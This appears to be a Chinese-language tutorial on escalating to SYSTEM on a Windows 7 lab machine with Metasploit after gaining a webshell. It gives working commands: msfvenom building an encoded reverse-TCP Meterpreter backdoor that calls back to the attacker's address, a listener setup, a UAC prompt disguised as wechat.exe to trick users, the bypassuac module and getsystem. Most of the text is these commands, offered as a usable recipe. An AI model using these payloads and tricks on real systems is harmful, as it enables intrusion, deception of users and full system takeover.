当我们获得一个网站的webshell后该如何提升权限呢?这里就针对windows来试试使用Metasploit提升权限
kali的ip:192.168.83.100
靶机 x86 win7 ip :192.168.83.33
假如我们已经拿到了靶机的webshell
我们先利用msfvenom生成一个后门,名字为msf.exe
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.83.100 LPORT=6666 -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe
参数解释:
--platform:平台 -p:payload LHOST:监听主机(kali的ip) LPORT:监听端口 -b:去除坏字符 -e:使用的编码 -f:生成文件格式
将生成的exe文件利用webshell管理工具上传到服务器
打开msfconsole
使用模块 exploit/multi/handler
执行use exploit/multi/handler
设置参数 set lhost 192.168.83.100 set lport 6666 set payload windows/meterpreter/reverse_tcp 执行 exploit
利用webshell执行上传的文件
然后msf获得了会话,session的id为4
当获得了session后,有两种情况
一种是你是欧皇,上来就是system权限
另一种情况你是非酋,不是system权限
然后你就要考虑怎么提权了
使用命令background将sessions放入后台
使用ask模块进行提权,使用该模块提权有个大问题,就是会触发uac机制use exploit/windows/local/ask 设置参数 set filename wechat.exe #伪装应用 set session 5 #设置session的id,我id 4有system权限,现在将id 5提权 开始攻击 exploit
然后靶机就触发了uac....,emmmm骗骗傻子应该可以,只要他点了是,msf就会开启一个新的session,在新会话中使用getsystem
命令后,再使用getuid
查看就成为了system权限
使用bypassuac模块提权,该模块的好处是不会触发uac机制,但是需要靶机连接session的用户在admins组
use exploit/windows/local/bypassuac set session 5 exploit
利用系统漏洞提权
关于session后台运行后怎么重新进入session:
sessions -i [id]
删除session:session -k [id]